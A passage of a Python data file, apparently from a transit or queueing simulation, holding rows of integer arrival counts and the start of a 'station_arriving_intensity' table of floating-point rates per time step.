(15, 11, 19, 18, 9, 8, 6, 5, 5, 5, 1, 2, 0, 10, 12, 8, 5, 7, 5, 7, 6, 11, 5, 2, 3, 0), # 40
(19, 10, 11, 15, 11, 8, 7, 4, 4, 5, 1, 2, 0, 11, 4, 6, 8, 13, 5, 5, 4, 7, 5, 4, 3, 0), # 41
(12, 15, 11, 16, 7, 8, 5, 4, 6, 3, 1, 2, 0, 17, 7, 9, 15, 13, 8, 9, 3, 7, 3, 0, 1, 0), # 42
(16, 7, 13, 14, 11, 5, 10, 5, 6, 0, 3, 2, 0, 15, 18, 5, 12, 13, 11, 10, 2, 10, 3, 3, 2, 0), # 43
(10, 9, 12, 7, 9, 9, 9, 7, 6, 4, 1, 1, 0, 11, 23, 12, 7, 12, 7, 6, 3, 10, 7, 2, 1, 0), # 44
(17, 16, 26, 7, 10, 2, 4, 5, 2, 1, 2, 1, 0, 13, 9, 6, 8, 10, 5, 4, 3, 4, 3, 2, 1, 0), # 45
(12, 14, 20, 12, 11, 5, 2, 6, 9, 5, 2, 0, 0, 17, 16, 13, 7, 17, 9, 2, 3, 5, 4, 0, 4, 0), # 46
(16, 20, 11, 16, 8, 7, 2, 8, 6, 3, 0, 1, 0, 14, 13, 12, 7, 12, 6, 6, 3, 1, 6, 4, 1, 0), # 47
(10, 13, 12, 18, 12, 7, 9, 6, 4, 3, 2, 1, 0, 24, 10, 6, 10, 10, 7, 3, 9, 5, 4, 1, 5, 0), # 48
(13, 10, 10, 13, 13, 7, 8, 5, 7, 2, 2, 0, 0, 17, 6, 9, 8, 11, 7, 9, 4, 8, 5, 2, 1, 0), # 49
(21, 9, 9, 14, 17, 3, 3, 4, 2, 2, 1, 2, 0, 19, 15, 12, 8, 9, 7, 3, 4, 5, 5, 1, 2, 0), # 50
(14, 14, 10, 17, 11, 5, 3, 8, 2, 4, 1, 0, 0, 10, 17, 13, 6, 11, 7, 6, 0, 5, 2, 1, 2, 0), # 51
(19, 16, 14, 9, 6, 7, 6, 2, 11, 2, 1, 1, 0, 9, 18, 14, 11, 5, 8, 5, 5, 8, 5, 0, 1, 0), # 52
(15, 15, 10, 13, 14, 3, 3, 4, 4, 1, 2, 0, 0, 12, 27, 12, 9, 12, 2, 2, 3, 4, 6, 5, 0, 0), # 53
(20, 14, 11, 7, 8, 5, 5, 3, 4, 5, 0, 1, 0, 8, 11, 8, 8, 9, 8, 4, 4, 3, 1, 1, 0, 0), # 54
(15, 12, 11, 9, 11, 6, 4, 8, 4, 3, 0, 0, 0, 18, 7, 11, 8, 13, 3, 5, 8, 6, 7, 2, 0, 0), # 55
(12, 16, 9, 9, 9, 5, 7, 4, 5, 1, 4, 2, 0, 17, 11, 11, 5, 12, 6, 2, 1, 7, 4, 2, 2, 0), # 56
(13, 16, 12, 7, 9, 9, 5, 1, 5, 4, 1, 1, 0, 14, 18, 11, 8, 12, 5, 8, 4, 2, 5, 4, 3, 0), # 57
(16, 16, 8, 19, 8, 1, 9, 2, 3, 4, 1, 4, 0, 10, 12, 6, 4, 19, 9, 9, 8, 4, 3, 2, 1, 0), # 58
(16, 11, 13, 12, 8, 5, 5, 6, 5, 1, 0, 1, 0, 14, 13, 15, 7, 14, 5, 6, 4, 2, 4, 2, 2, 0), # 59
(12, 14, 8, 14, 8, 9, 4, 5, 9, 0, 3, 1, 0, 25, 9, 11, 7, 8, 5, 6, 1, 5, 3, 1, 1, 0), # 60
(17, 15, 10, 9, 10, 6, 4, 3, 6, 4, 2, 2, 0, 8, 12, 7, 4, 10, 7, 4, 2, 4, 3, 4, 3, 0), # 61
(14, 13, 7, 14, 4, 3, 5, 5, 5, 3, 1, 1, 0, 18, 9, 10, 9, 10, 6, 6, 2, 3, 4, 4, 0, 0), # 62
(10, 18, 6, 10, 7, 3, 7, 3, 5, 4, 2, 1, 0, 6, 16, 7, 6, 11, 3, 6, 1, 5, 7, 3, 1, 0), # 63
(16, 15, 11, 15, 13, 4, 3, 3, 8, 3, 2, 1, 0, 15, 12, 8, 4, 9, 7, 9, 4, 7, 3, 0, 1, 0), # 64
(14, 16, 11, 9, 13, 4, 4, 7, 4, 6, 1, 1, 0, 11, 14, 8, 5, 15, 5, 3, 6, 5, 8, 5, 1, 0), # 65
(12, 11, 13, 15, 7, 4, 7, 0, 6, 5, 2, 0, 0, 11, 24, 13, 2, 8, 4, 6, 5, 3, 8, 2, 0, 0), # 66
(15, 15, 13, 13, 16, 5, 2, 7, 1, 4, 5, 2, 0, 10, 13, 16, 9, 13, 6, 4, 8, 5, 6, 5, 1, 0), # 67
(14, 9, 15, 9, 15, 8, 5, 6, 2, 0, 4, 1, 0, 6, 10, 8, 6, 8, 8, 6, 3, 4, 6, 1, 1, 0), # 68
(15, 11, 11, 16, 10, 3, 6, 3, 5, 5, 2, 0, 0, 16, 12, 9, 7, 17, 7, 3, 4, 2, 7, 0, 0, 0), # 69
(10, 10, 14, 13, 13, 4, 9, 6, 5, 2, 5, 1, 0, 17, 15, 6, 13, 8, 10, 4, 2, 5, 5, 1, 0, 0), # 70
(13, 12, 10, 22, 17, 8, 5, 3, 5, 3, 2, 4, 0, 14, 12, 10, 5, 12, 5, 9, 4, 4, 4, 4, 3, 0), # 71
(16, 11, 10, 13, 14, 6, 4, 7, 8, 2, 0, 0, 0, 13, 14, 15, 8, 13, 8, 3, 2, 6, 4, 3, 2, 0), # 72
(14, 14, 9, 11, 11, 3, 2, 6, 4, 3, 1, 0, 0, 16, 15, 8, 10, 11, 7, 5, 1, 10, 2, 2, 1, 0), # 73
(16, 8, 8, 6, 5, 8, 6, 3, 4, 1, 3, 2, 0, 17, 14, 4, 8, 12, 9, 5, 5, 6, 3, 1, 3, 0), # 74
(13, 23, 8, 14, 9, 5, 3, 3, 10, 2, 2, 1, 0, 21, 11, 10, 17, 8, 8, 7, 4, 8, 3, 5, 1, 0), # 75
(14, 16, 7, 11, 15, 9, 4, 5, 6, 3, 1, 1, 0, 10, 11, 9, 3, 10, 2, 5, 9, 5, 4, 3, 1, 0), # 76
(10, 16, 9, 17, 15, 4, 5, 9, 10, 3, 1, 2, 0, 15, 16, 10, 8, 10, 6, 6, 4, 1, 5, 2, 1, 0), # 77
(13, 8, 13, 20, 7, 7, 9, 1, 5, 2, 4, 0, 0, 10, 14, 5, 8, 8, 3, 4, 3, 2, 5, 2, 1, 0), # 78
(19, 11, 13, 11, 9, 3, 10, 2, 4, 2, 2, 3, 0, 24, 16, 12, 7, 11, 12, 5, 3, 6, 6, 2, 2, 0), # 79
(18, 17, 10, 6, 7, 4, 4, 8, 4, 1, 2, 1, 0, 14, 12, 12, 8, 10, 4, 6, 7, 6, 5, 4, 1, 0), # 80
(10, 13, 10, 8, 7, 4, 5, 3, 3, 4, 0, 0, 0, 12, 6, 9, 10, 16, 6, 6, 6, 8, 8, 4, 0, 0), # 81
(16, 15, 6, 10, 7, 1, 6, 4, 8, 2, 0, 0, 0, 18, 12, 4, 4, 11, 2, 7, 3, 6, 6, 4, 0, 0), # 82
(10, 10, 12, 4, 10, 3, 4, 5, 8, 3, 0, 2, 0, 12, 13, 9, 5, 20, 2, 4, 4, 4, 7, 1, 1, 0), # 83
(12, 16, 13, 9, 13, 4, 5, 4, 2, 2, 1, 0, 0, 15, 13, 15, 6, 10, 6, 7, 2, 5, 4, 3, 3, 0), # 84
(10, 9, 15, 17, 9, 3, 6, 5, 5, 1, 1, 0, 0, 13, 11, 13, 5, 13, 11, 7, 7, 2, 1, 1, 1, 0), # 85
(18, 11, 9, 11, 5, 6, 6, 2, 5, 3, 3, 1, 0, 12, 15, 8, 3, 10, 5, 3, 6, 5, 3, 1, 0, 0), # 86
(11, 6, 14, 11, 14, 5, 4, 7, 5, 2, 4, 1, 0, 19, 15, 7, 5, 11, 6, 4, 0, 9, 4, 2, 2, 0), # 87
(12, 6, 12, 9, 14, 4, 7, 6, 4, 3, 3, 0, 0, 12, 14, 4, 11, 13, 8, 3, 7, 7, 2, 2, 0, 0), # 88
(18, 10, 13, 13, 12, 9, 6, 3, 10, 5, 1, 0, 0, 17, 8, 8, 9, 14, 2, 4, 2, 8, 2, 5, 1, 0), # 89
(15, 7, 11, 7, 15, 5, 7, 5, 6, 3, 2, 0, 0, 10, 15, 9, 11, 12, 3, 5, 5, 6, 0, 0, 3, 0), # 90
(12, 11, 14, 11, 15, 3, 7, 7, 4, 2, 1, 1, 0, 13, 9, 12, 3, 4, 8, 6, 4, 3, 9, 4, 0, 0), # 91
(19, 12, 12, 14, 8, 7, 3, 4, 1, 1, 5, 1, 0, 19, 10, 8, 4, 7, 6, 5, 4, 4, 1, 2, 0, 0), # 92
(14, 6, 15, 17, 8, 11, 3, 8, 8, 1, 1, 1, 0, 7, 16, 13, 7, 8, 6, 1, 7, 4, 1, 2, 2, 0), # 93
(15, 14, 13, 17, 6, 2, 3, 4, 9, 2, 2, 3, 0, 11, 15, 9, 2, 19, 3, 5, 3, 5, 4, 1, 0, 0), # 94
(20, 14, 9, 13, 10, 2, 8, 3, 4, 0, 2, 1, 0, 17, 10, 15, 3, 7, 8, 1, 4, 11, 4, 0, 2, 0), # 95
(13, 10, 16, 10, 12, 4, 5, 1, 2, 2, 3, 1, 0, 12, 12, 10, 4, 9, 6, 2, 0, 6, 2, 0, 0, 0), # 96
(12, 10, 12, 12, 10, 4, 3, 2, 3, 3, 2, 0, 0, 9, 9, 10, 10, 10, 4, 9, 4, 8, 4, 4, 2, 0), # 97
(13, 12, 7, 12, 10, 1, 3, 4, 10, 0, 0, 3, 0, 11, 12, 12, 2, 14, 7, 2, 0, 4, 7, 4, 3, 0), # 98
(17, 11, 12, 11, 9, 5, 3, 4, 2, 1, 1, 2, 0, 14, 10, 11, 5, 12, 5, 2, 5, 3, 4, 2, 2, 0), # 99
(15, 18, 15, 16, 9, 2, 4, 8, 6, 4, 5, 1, 0, 17, 11, 9, 6, 5, 4, 6, 7, 3, 2, 4, 1, 0), # 100
(10, 13, 16, 14, 9, 6, 8, 2, 9, 3, 0, 0, 0, 17, 12, 6, 3, 15, 5, 6, 2, 4, 10, 2, 2, 0), # 101
(14, 12, 9, 10, 12, 6, 7, 3, 4, 2, 2, 0, 0, 13, 10, 2, 6, 8, 5, 5, 3, 3, 0, 1, 1, 0), # 102
(16, 7, 6, 11, 12, 10, 7, 5, 8, 6, 0, 0, 0, 16, 9, 7, 5, 6, 7, 3, 2, 4, 9, 1, 1, 0), # 103
(15, 8, 13, 11, 14, 2, 3, 5, 6, 3, 4, 4, 0, 8, 16, 6, 9, 9, 6, 3, 2, 11, 4, 4, 1, 0), # 104
(12, 15, 7, 13, 10, 4, 7, 0, 7, 2, 2, 0, 0, 14, 7, 8, 6, 12, 8, 5, 3, 8, 5, 3, 2, 0), # 105
(14, 8, 10, 9, 8, 3, 4, 6, 5, 4, 5, 2, 0, 20, 8, 14, 5, 11, 7, 4, 8, 12, 4, 2, 0, 0), # 106
(15, 9, 17, 18, 10, 3, 7, 4, 6, 2, 5, 2, 0, 11, 13, 8, 5, 14, 6, 3, 4, 7, 6, 1, 0, 0), # 107
(11, 10, 6, 12, 12, 5, 1, 3, 6, 0, 5, 3, 0, 21, 7, 7, 12, 10, 3, 6, 3, 12, 3, 0, 1, 0), # 108
(13, 8, 8, 6, 12, 5, 3, 5, 5, 0, 0, 0, 0, 17, 10, 11, 5, 10, 3, 4, 4, 3, 4, 2, 0, 0), # 109
(19, 11, 8, 20, 10, 7, 4, 4, 5, 4, 1, 0, 0, 13, 9, 5, 2, 10, 4, 7, 4, 6, 1, 2, 1, 0), # 110
(7, 14, 11, 12, 11, 3, 7, 4, 7, 1, 1, 2, 0, 8, 7, 7, 8, 10, 2, 5, 2, 6, 3, 1, 2, 0), # 111
(22, 14, 7, 8, 10, 4, 4, 1, 7, 3, 0, 3, 0, 15, 15, 7, 5, 12, 5, 5, 8, 3, 2, 3, 0, 0), # 112
(4, 9, 16, 9, 14, 2, 2, 4, 5, 3, 2, 0, 0, 18, 4, 7, 5, 16, 5, 6, 7, 8, 3, 3, 2, 0), # 113
(18, 6, 13, 7, 5, 5, 5, 4, 6, 1, 1, 0, 0, 9, 9, 10, 10, 14, 4, 5, 0, 2, 4, 1, 2, 0), # 114
(20, 9, 9, 15, 12, 6, 2, 0, 3, 5, 2, 0, 0, 16, 14, 5, 7, 8, 5, 8, 2, 3, 1, 3, 1, 0), # 115
(14, 10, 19, 5, 12, 8, 4, 6, 3, 3, 1, 2, 0, 10, 5, 9, 6, 6, 3, 5, 2, 5, 6, 2, 0, 0), # 116
(9, 15, 15, 12, 10, 10, 2, 7, 8, 1, 1, 1, 0, 19, 9, 11, 11, 10, 7, 1, 1, 4, 7, 2, 1, 0), # 117
(15, 14, 11, 9, 11, 1, 3, 4, 11, 2, 1, 2, 0, 8, 10, 8, 6, 15, 3, 4, 3, 9, 1, 1, 1, 0), # 118
(14, 12, 11, 11, 12, 7, 4, 5, 1, 3, 1, 2, 0, 18, 7, 11, 10, 10, 10, 3, 3, 4, 5, 2, 0, 0), # 119
(12, 12, 11, 15, 12, 2, 5, 2, 6, 0, 3, 2, 0, 13, 8, 7, 6, 11, 6, 2, 7, 4, 2, 2, 0, 0), # 120
(14, 10, 17, 13, 7, 3, 4, 5, 2, 4, 0, 2, 0, 15, 10, 8, 6, 7, 6, 7, 2, 1, 2, 2, 0, 0), # 121
(18, 10, 10, 15, 7, 6, 8, 2, 5, 3, 4, 2, 0, 12, 13, 6, 5, 9, 8, 5, 6, 8, 3, 3, 0, 0), # 122
(13, 10, 17, 8, 6, 5, 3, 6, 5, 0, 5, 0, 0, 14, 10, 7, 6, 11, 0, 2, 2, 4, 4, 1, 1, 0), # 123
(12, 12, 8, 14, 9, 6, 4, 2, 1, 0, 2, 0, 0, 12, 10, 7, 8, 8, 3, 7, 4, 8, 5, 1, 0, 0), # 124
(11, 5, 7, 18, 13, 3, 7, 2, 2, 1, 0, 0, 0, 11, 9, 9, 4, 4, 6, 6, 4, 4, 2, 2, 1, 0), # 125
(14, 7, 9, 17, 9, 6, 2, 1, 4, 0, 0, 2, 0, 17, 9, 6, 4, 14, 5, 4, 1, 1, 4, 2, 0, 0), # 126
(10, 9, 7, 7, 9, 0, 4, 3, 6, 1, 1, 0, 0, 15, 12, 10, 3, 5, 2, 8, 2, 7, 2, 3, 0, 0), # 127
(10, 13, 12, 11, 8, 8, 4, 2, 6, 1, 1, 1, 0, 10, 10, 8, 4, 8, 3, 2, 4, 5, 3, 2, 2, 0), # 128
(6, 9, 20, 14, 12, 3, 5, 6, 3, 0, 1, 2, 0, 15, 8, 7, 5, 5, 3, 6, 7, 3, 4, 2, 0, 0), # 129
(15, 5, 10, 10, 9, 2, 6, 2, 5, 5, 0, 1, 0, 12, 9, 9, 6, 7, 4, 1, 5, 2, 4, 1, 1, 0), # 130
(11, 4, 11, 6, 8, 4, 5, 1, 1, 2, 1, 2, 0, 11, 8, 5, 3, 5, 8, 7, 2, 7, 4, 2, 1, 0), # 131
(5, 9, 9, 4, 10, 5, 3, 3, 6, 0, 3, 3, 0, 11, 12, 5, 8, 5, 9, 6, 3, 8, 4, 1, 1, 0), # 132
(11, 18, 10, 12, 8, 4, 2, 5, 3, 3, 3, 0, 0, 10, 11, 9, 6, 8, 6, 3, 6, 4, 3, 1, 1, 0), # 133
(13, 10, 10, 6, 9, 8, 4, 5, 4, 0, 3, 1, 0, 16, 10, 6, 6, 17, 2, 5, 4, 8, 7, 2, 0, 0), # 134
(15, 12, 12, 9, 10, 4, 6, 2, 2, 0, 3, 0, 0, 12, 7, 10, 4, 9, 8, 5, 2, 4, 4, 8, 2, 0), # 135
(11, 12, 8, 16, 8, 2, 3, 6, 5, 2, 1, 1, 0, 11, 9, 7, 7, 4, 7, 2, 6, 9, 4, 1, 0, 0), # 136
(12, 3, 14, 7, 10, 5, 4, 3, 5, 1, 2, 2, 0, 13, 4, 4, 6, 6, 4, 5, 1, 7, 5, 2, 0, 0), # 137
(14, 12, 10, 14, 13, 3, 6, 4, 4, 6, 2, 0, 0, 11, 8, 9, 8, 9, 3, 2, 4, 4, 3, 1, 0, 0), # 138
(10, 10, 9, 16, 16, 4, 1, 5, 5, 0, 1, 0, 0, 12, 12, 7, 3, 8, 8, 4, 1, 5, 2, 3, 1, 0), # 139
(12, 10, 16, 9, 7, 1, 4, 2, 5, 2, 2, 3, 0, 7, 12, 8, 4, 11, 7, 6, 5, 3, 6, 2, 0, 0), # 140
(13, 8, 6, 5, 7, 7, 5, 6, 3, 0, 4, 0, 0, 13, 8, 4, 2, 6, 6, 4, 4, 1, 2, 1, 1, 0), # 141
(13, 11, 12, 14, 11, 5, 2, 3, 3, 0, 2, 2, 0, 12, 10, 3, 7, 9, 6, 8, 2, 5, 6, 4, 1, 0), # 142
(17, 4, 14, 8, 10, 6, 1, 5, 6, 1, 0, 2, 0, 18, 9, 8, 6, 12, 4, 5, 1, 6, 4, 4, 1, 0), # 143
(12, 13, 11, 10, 5, 2, 4, 1, 7, 4, 2, 0, 0, 9, 8, 6, 6, 8, 5, 3, 2, 3, 1, 2, 2, 0), # 144
(6, 14, 9, 8, 8, 4, 3, 3, 3, 1, 4, 0, 0, 19, 11, 9, 3, 14, 5, 5, 4, 2, 2, 4, 2, 0), # 145
(13, 8, 15, 11, 7, 3, 0, 2, 9, 1, 1, 1, 0, 15, 11, 11, 7, 13, 12, 2, 1, 2, 0, 3, 0, 0), # 146
(11, 10, 11, 11, 10, 5, 3, 2, 1, 3, 0, 1, 0, 13, 11, 9, 6, 9, 6, 4, 3, 2, 1, 0, 0, 0), # 147
(12, 3, 9, 10, 21, 7, 2, 6, 5, 0, 2, 1, 0, 9, 9, 3, 8, 11, 3, 3, 4, 5, 4, 0, 0, 0), # 148
(12, 7, 0, 12, 10, 9, 4, 1, 4, 1, 1, 2, 0, 12, 13, 10, 4, 7, 2, 3, 2, 8, 4, 3, 0, 0), # 149
(7, 9, 9, 8, 13, 3, 4, 3, 2, 1, 4, 0, 0, 13, 9, 10, 4, 9, 2, 2, 5, 5, 2, 5, 2, 0), # 150
(9, 14, 9, 10, 12, 2, 2, 3, 6, 2, 1, 1, 0, 11, 10, 9, 7, 8, 5, 2, 3, 0, 7, 1, 0, 0), # 151
(11, 13, 12, 6, 8, 4, 6, 7, 6, 2, 1, 0, 0, 10, 11, 8, 8, 5, 7, 4, 5, 5, 1, 1, 2, 0), # 152
(16, 4, 6, 13, 10, 7, 2, 3, 6, 4, 1, 0, 0, 10, 11, 5, 5, 8, 3, 6, 4, 5, 3, 2, 0, 0), # 153
(14, 8, 9, 8, 9, 2, 2, 3, 4, 2, 3, 0, 0, 14, 11, 4, 6, 9, 5, 5, 4, 2, 2, 0, 0, 0), # 154
(3, 5, 7, 4, 4, 6, 4, 8, 8, 0, 0, 1, 0, 13, 5, 4, 8, 7, 5, 5, 1, 3, 1, 1, 1, 0), # 155
(6, 9, 16, 14, 9, 4, 4, 2, 4, 1, 0, 0, 0, 11, 8, 3, 3, 6, 3, 7, 4, 4, 4, 4, 0, 0), # 156
(6, 15, 14, 9, 13, 5, 2, 1, 5, 3, 2, 0, 0, 14, 8, 8, 8, 13, 5, 3, 0, 5, 1, 3, 0, 0), # 157
(12, 6, 11, 13, 8, 4, 2, 1, 3, 4, 3, 2, 0, 9, 12, 10, 4, 12, 2, 2, 6, 3, 3, 2, 0, 0), # 158
(8, 7, 5, 11, 6, 6, 2, 1, 6, 1, 2, 1, 0, 9, 10, 5, 4, 8, 5, 4, 2, 5, 4, 3, 1, 0), # 159
(5, 7, 4, 4, 5, 5, 2, 2, 12, 2, 2, 0, 0, 7, 8, 7, 4, 9, 4, 4, 4, 7, 5, 1, 0, 0), # 160
(8, 6, 14, 7, 11, 7, 3, 2, 5, 3, 0, 1, 0, 8, 8, 4, 7, 18, 3, 4, 3, 2, 4, 5, 1, 0), # 161
(4, 6, 10, 12, 10, 6, 4, 5, 3, 2, 1, 1, 0, 12, 9, 6, 6, 9, 4, 3, 4, 5, 1, 4, 0, 0), # 162
(8, 8, 5, 14, 6, 4, 2, 5, 0, 3, 2, 1, 0, 8, 9, 4, 3, 7, 4, 2, 2, 3, 1, 1, 0, 0), # 163
(9, 10, 9, 12, 6, 5, 3, 3, 2, 1, 0, 1, 0, 7, 10, 5, 6, 9, 3, 6, 6, 5, 3, 1, 0, 0), # 164
(10, 6, 11, 11, 10, 5, 5, 2, 2, 2, 2, 0, 0, 9, 7, 6, 6, 10, 4, 1, 4, 3, 2, 0, 3, 0), # 165
(9, 11, 11, 8, 12, 2, 4, 0, 4, 1, 0, 1, 0, 14, 5, 6, 4, 5, 8, 3, 0, 3, 1, 3, 1, 0), # 166
(9, 6, 5, 8, 12, 9, 2, 1, 6, 1, 1, 1, 0, 14, 5, 2, 4, 12, 5, 3, 2, 5, 2, 1, 1, 0), # 167
(9, 5, 6, 11, 7, 4, 2, 0, 5, 1, 4, 1, 0, 12, 4, 6, 5, 1, 6, 1, 4, 4, 1, 1, 0, 0), # 168
(11, 5, 5, 7, 11, 2, 1, 4, 2, 2, 1, 2, 0, 10, 12, 5, 0, 5, 3, 2, 2, 3, 3, 2, 1, 0), # 169
(5, 3, 7, 10, 8, 2, 1, 0, 2, 4, 1, 2, 0, 3, 7, 5, 4, 7, 2, 1, 1, 0, 2, 0, 0, 0), # 170
(11, 6, 9, 11, 5, 3, 3, 1, 2, 0, 1, 0, 0, 9, 4, 7, 4, 9, 3, 0, 1, 2, 1, 1, 0, 0), # 171
(9, 7, 8, 7, 9, 2, 1, 4, 3, 2, 2, 0, 0, 3, 5, 5, 4, 3, 2, 2, 2, 3, 1, 0, 0, 0), # 172
(11, 5, 9, 9, 3, 1, 0, 1, 8, 2, 1, 1, 0, 5, 4, 9, 0, 6, 3, 1, 1, 6, 5, 1, 0, 0), # 173
(4, 6, 5, 10, 5, 5, 2, 2, 3, 2, 0, 0, 0, 8, 7, 4, 5, 8, 2, 1, 0, 3, 3, 0, 1, 0), # 174
(5, 2, 4, 4, 5, 0, 4, 4, 5, 0, 1, 0, 0, 8, 5, 7, 4, 6, 3, 2, 5, 3, 0, 1, 0, 0), # 175
(5, 9, 10, 5, 1, 1, 1, 3, 4, 2, 1, 1, 0, 5, 2, 2, 3, 5, 2, 0, 1, 2, 1, 2, 1, 0), # 176
(3, 3, 8, 7, 4, 4, 0, 2, 0, 1, 0, 1, 0, 8, 7, 3, 6, 7, 3, 2, 3, 3, 2, 1, 0, 0), # 177
(1, 3, 4, 6, 5, 2, 1, 3, 5, 1, 0, 1, 0, 4, 8, 8, 7, 7, 3, 2, 3, 3, 3, 0, 0, 0), # 178
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), # 179
)
station_arriving_intensity = (
(7.029211809720476, 7.735403983570434, 7.29579652145751, 8.700534883408807, 7.776559850653457, 4.394116904852274, 5.804449861523481, 6.514446642171193, 8.52613868703521, 5.541221021731318, 5.887371229439844, 6.857081109628643, 7.117432297609708), # 0
(7.496058012827964, 8.246084971802663, 7.777485227862214, 9.275201954587263, 8.291486472463932, 4.684377017659578, 6.187256517769172, 6.943319212067992, 9.089143456866074, 5.90657296918801, 6.2763345903385845, 7.309703325140097, 7.587708306415797), # 1
(7.9614122125716245, 8.754739239247371, 8.257259199766379, 9.847582786530712, 8.804548163249642, 4.9734791603174235, 6.568545911144986, 7.370475347066188, 9.64990152962857, 6.270479285028765, 6.663752408286839, 7.760525712874277, 8.056110759493567), # 2
(8.423460910405188, 9.259348702711026, 8.733215217047796, 10.415406970544904, 9.313726346402664, 5.260276871619158, 6.946805098307138, 7.79422162049231, 10.206189225289531, 6.631495777796654, 7.0480877765583365, 8.207759958902646, 8.520781928755916), # 3
(8.880390607782374, 9.757895279000085, 9.203450059584252, 10.976404097935598, 9.81700244531509, 5.543623690358135, 7.320521135911843, 8.212864605672882, 10.75578286381579, 6.988178256034751, 7.4278037884268056, 8.64961774929667, 8.979864086115745), # 4
(9.330387806156915, 10.248360884921025, 9.666060507253526, 11.528303760008551, 10.312357883378994, 5.822373155327701, 7.688181080615314, 8.62471087593443, 11.296458765174183, 7.339082528286129, 7.801363537165986, 9.084310770127807, 9.43149950348596), # 5
(9.771639006982534, 10.728727437280302, 10.119143339933412, 12.068835548069513, 10.79777408398646, 6.09537880532121, 8.048271989073768, 9.028067004603484, 11.825993249331543, 7.682764403093862, 8.167230116049597, 9.510050707467531, 9.87383045277945), # 6
(10.202330711712957, 11.196976852884385, 10.56079533750169, 12.595729053424249, 11.271232470529577, 6.36149417913201, 8.39928091794342, 9.421239565006573, 12.342162636254702, 8.017779689001022, 8.523866618351377, 9.925049247387301, 10.304999205909127), # 7
(10.62064942180191, 11.651091048539739, 10.989113279836156, 13.1067138673785, 11.730714466400421, 6.619572815553446, 8.739694923880478, 9.802535130470215, 12.842743245910489, 8.342684194550685, 8.86973613734505, 10.327518075958585, 10.723148034787885), # 8
(11.02478163870312, 12.089051941052832, 11.402193946814586, 13.599519581238038, 12.174201494991074, 6.868468253378878, 9.068001063541168, 10.170260274320949, 13.325511398265744, 8.65603372828592, 9.20330176630435, 10.71566887925284, 11.126419211328628), # 9
(11.412913863870306, 12.508841447230123, 11.798134118314776, 14.071875786308604, 12.599674979693622, 7.107034031401651, 9.382686393581697, 10.522721569885295, 13.7882434132873, 8.956384098749801, 9.523026598503003, 11.087713343341534, 11.512955007444255), # 10
(11.783232598757209, 12.90844148387809, 12.175030574214501, 14.521512073895957, 13.005116343900148, 7.334123688415116, 9.682237970658283, 10.85822559048978, 14.228715610941991, 9.242291114485408, 9.82737372721475, 11.441863154296136, 11.880897695047656), # 11
(12.133924344817538, 13.285833967803178, 12.530980094391557, 14.946158035305858, 13.38850701100273, 7.5485907632126175, 9.965142851427137, 11.17507890946093, 14.644704311196652, 9.512310584035802, 10.114806245713309, 11.776329998188096, 12.22838954605175), # 12
(12.463175603505027, 13.639000815811869, 12.864079458723728, 15.343543261844063, 13.747828404393443, 7.749288794587514, 10.22988809254448, 11.471588100125276, 15.033985834018106, 9.764998315944066, 10.383787247272418, 12.08932556108889, 12.55357283236943), # 13
(12.769172876273403, 13.965923944710624, 13.172425447088806, 15.71139734481631, 14.081061947464386, 7.935071321333148, 10.474960750666526, 11.746059735809345, 15.39433649937319, 9.998910118753269, 10.6327798251658, 12.379061529069986, 12.85458982591359), # 14
(13.050102664576398, 14.264585271305906, 13.45411483936456, 16.047449875528383, 14.386189063607633, 8.104791882242878, 10.698847882449478, 11.99680038983966, 15.723532627228748, 10.212601801006487, 10.860247072667189, 12.64374958820284, 13.129582798597134), # 15
(13.30415146986772, 14.532966712404187, 13.707244415428796, 16.349430445286004, 14.661191176215267, 8.257304016110044, 10.900036544549568, 12.222116635542745, 16.019350537551603, 10.404629171246796, 11.06465208305032, 12.881601424558916, 13.376694022332964), # 16
(13.529505793601107, 14.769050184811926, 13.929910955159293, 16.61506864539496, 14.904049708679375, 8.391461261728, 11.077013793622996, 12.420315046245145, 16.27956655030858, 10.573548038017254, 11.24445794958892, 13.090828724209679, 13.594065769033982), # 17
(13.724352137230287, 14.970817605335585, 14.120211238433834, 16.842094067160993, 15.112746084392025, 8.506117157890104, 11.228266686325993, 12.589702195273366, 16.501956985466535, 10.717914209860952, 11.398127765556712, 13.269643173226603, 13.779840310613086), # 18
(13.88687700220898, 15.136250890781643, 14.27624204513021, 17.02823630188984, 15.285261726745313, 8.600125243389693, 11.352282279314753, 12.728584655953943, 16.68429816299229, 10.83628349532096, 11.52412462422743, 13.416256457681136, 13.932159918983176), # 19
(14.015266889990915, 15.263331957956549, 14.396100155126206, 17.171224940887296, 15.419578059131322, 8.672339057020126, 11.44754762924551, 12.835269001613405, 16.82436640285268, 10.927211702940342, 11.62091161887481, 13.528880263644748, 14.049166866057154), # 20
(14.107708302029813, 15.350042723666784, 14.477882348299607, 17.26878957545908, 15.513676504942126, 8.72161213757475, 11.512549792774463, 12.908061805578273, 16.91993802501453, 10.989254641262178, 11.686951842772585, 13.60572627718891, 14.12900342374791), # 21
(14.162387739779412, 15.394365104718803, 14.5196854045282, 17.31865979691097, 15.565538487569807, 8.746798023846914, 11.54577582655784, 12.945269641175082, 16.968789349444684, 11.02096811882954, 11.720708389194478, 13.645006184385087, 14.16981186396836), # 22
(14.182550708679697, 15.39961303155007, 14.524892455418383, 17.324903137860087, 15.578824878445637, 8.75, 11.549725603163076, 12.949291358024693, 16.974896728395063, 11.024709181527207, 11.724941252026436, 13.649856607224509, 14.175), # 23
(14.197417378247815, 15.396551851851854, 14.524040740740743, 17.324134722222226, 15.586350659060795, 8.75, 11.547555337690634, 12.943700000000002, 16.974078333333335, 11.02241086419753, 11.724474410774413, 13.648720987654322, 14.175), # 24
(14.211970122296213, 15.390517832647463, 14.522359396433473, 17.322614454732513, 15.593710923832306, 8.75, 11.543278463648836, 12.932716049382718, 16.97246141975309, 11.01788637402835, 11.723548759196907, 13.646479195244629, 14.175), # 25
(14.226207826667249, 15.381603155006863, 14.519871467764064, 17.320359619341563, 15.600905415789548, 8.75, 11.53696140563221, 12.916546913580248, 16.97006672839506, 11.011210992226795, 11.722172677391198, 13.643161957018751, 14.175), # 26
(14.240129377203292, 15.3699, 14.5166, 17.3173875, 15.607933877961901, 8.75, 11.528670588235297, 12.895400000000002, 16.966915, 11.00246, 11.720354545454546, 13.638800000000003, 14.175), # 27
(14.253733659746702, 15.355500548696845, 14.51256803840878, 17.313715380658437, 15.614796053378763, 8.75, 11.518472436052612, 12.869482716049385, 16.963026975308644, 10.9917086785551, 11.718102743484225, 13.633424051211708, 14.175), # 28
